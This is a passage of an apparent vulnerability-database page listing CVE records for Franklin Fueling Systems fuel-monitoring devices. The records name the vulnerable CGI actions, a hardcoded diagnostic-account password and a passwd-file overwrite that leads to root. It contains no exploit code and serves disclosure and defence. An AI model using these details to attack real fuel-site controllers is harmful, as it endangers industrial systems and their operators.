"url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2014-001.txt"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2014-01-03T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "cgi-bin/tsaws.cgi in Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 allows remote attackers to discover sensitive information (user names and password hashes) via the cmdWebGetConfiguration action in a TSA_REQUEST."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2014-01-26T00:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2014-001.txt"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-7247",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "cgi-bin/tsaws.cgi in Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 allows remote attackers to discover sensitive information (user names and password hashes) via the cmdWebGetConfiguration action in a TSA_REQUEST."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.trustwave.com/spiderlabs/advisories/TWSL2014-001.txt",
"refsource": "MISC",
"url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2014-001.txt"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-7247",
"datePublished": "2014-01-26T01:00:00.000Z",
"dateReserved": "2013-12-31T00:00:00.000Z",
"dateUpdated": "2024-08-06T18:01:19.818Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-44039 (GCVE-0-2022-44039)
Vulnerability from cvelistv5 – Published: 2022-12-05 00:00 – Updated: 2025-04-24 13:55
VLAI
Summary
Franklin Fueling System FFS Colibri 1.9.22.8925 is affected by: File system overwrite. The impact is: File system rewrite (remote). ¶¶ An attacker can overwrite system files like [system.conf] and [passwd], this occurs because the insecure usage of "fopen" system function with the mode "wb" which allows overwriting file if exists. Overwriting files such as passwd, allows an attacker to escalate his privileges by planting backdoor user with root privilege or change root password.
Severity
9.8 (Critical)
SSVC
Exploitation: poc
Automatable: yes
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
- n/a
- CWE-863 - Incorrect Authorization
Assigner
References
1 reference
| URL | Tags |
|---|---|
| https://pastebin.com/raw/64stbsWu |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T13:47:05.502Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://pastebin.com/raw/64stbsWu"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2022-44039",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-04-24T13:54:59.273366Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-863",
"description": "CWE-863 Incorrect Authorization",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-04-24T13:55:15.058Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Franklin Fueling System FFS Colibri 1.9.22.8925 is affected by: File system overwrite. The impact is: File system rewrite (remote). \u00b6\u00b6 An attacker can overwrite system files like [system.conf] and [passwd], this occurs because the insecure usage of \"fopen\" system function with the mode \"wb\" which allows overwriting file if exists. Overwriting files such as passwd, allows an attacker to escalate his privileges by planting backdoor user with root privilege or change root password."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-12-05T00:00:00.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://pastebin.com/raw/64stbsWu"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2022-44039",
"datePublished": "2022-12-05T00:00:00.000Z",
"dateReserved": "2022-10-30T00:00:00.000Z",
"dateUpdated": "2025-04-24T13:55:15.058Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2013-7248 (GCVE-0-2013-7248)
Vulnerability from cvelistv5 – Published: 2014-01-26 01:00 – Updated: 2024-08-06 18:01
VLAI
Summary
Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 has a hardcoded password for the roleDiag account, which allows remote attackers to gain root privileges, as demonstrated using a cmdWebCheckRole action in a TSA_REQUEST.
Severity
No CVSS data available.
CWE
- n/a
Assigner
References
1 reference
| URL | Tags |
|---|---|
| https://www.trustwave.com/spiderlabs/advisories/T… | x_refsource_MISC |
Date Public
2014-01-03 00:00
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T18:01:19.723Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2014-001.txt"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2014-01-03T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 has a hardcoded password for the roleDiag account, which allows remote attackers to gain root privileges, as demonstrated using a cmdWebCheckRole action in a TSA_REQUEST."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2014-01-26T00:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2014-001.txt"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-7248",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 has a hardcoded password for the roleDiag account, which allows remote attackers to gain root privileges, as demonstrated using a cmdWebCheckRole action in a TSA_REQUEST."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.trustwave.com/spiderlabs/advisories/TWSL2014-001.txt",
"refsource": "MISC",
"url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2014-001.txt"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-7248",
"datePublished": "2014-01-26T01:00:00.000Z",
"dateReserved": "2013-12-31T00:00:00.000Z",
"dateUpdated": "2024-08-06T18:01:19.723Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2013-7247 (GCVE-0-2013-7247)
Vulnerability from cvelistv5 – Published: 2014-01-26 01:00 – Updated: 2024-08-06 18:01
VLAI
Summary
cgi-bin/tsaws.cgi in Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 allows remote attackers to discover sensitive information (user names and password hashes) via the cmdWebGetConfiguration action in a TSA_REQUEST.
Severity
No CVSS data available.
CWE
- n/a
Assigner
References
1 reference
| URL | Tags |
|---|---|
| https://www.trustwave.com/spiderlabs/advisories/T… | x_refsource_MISC |
Date Public
2014-01-03 00:00
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T18:01:19.818Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2014-001.txt"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2014-01-03T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "cgi-bin/tsaws.cgi in Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 allows remote attackers to discover sensitive information (user names and password hashes) via the cmdWebGetConfiguration action in a TSA_REQUEST."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2014-01-26T00:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2014-001.txt"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-7247",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "cgi-bin/tsaws.cgi in Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 allows remote attackers to discover sensitive information (user names and password hashes) via the cmdWebGetConfiguration action in a TSA_REQUEST."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.trustwave.com/spiderlabs/advisories/TWSL2014-001.txt",
"refsource": "MISC",
"url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2014-001.txt"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-7247",
"datePublished": "2014-01-26T01:00:00.000Z",
"dateReserved": "2013-12-31T00:00:00.000Z",
"dateUpdated": "2024-08-06T18:01:19.818Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}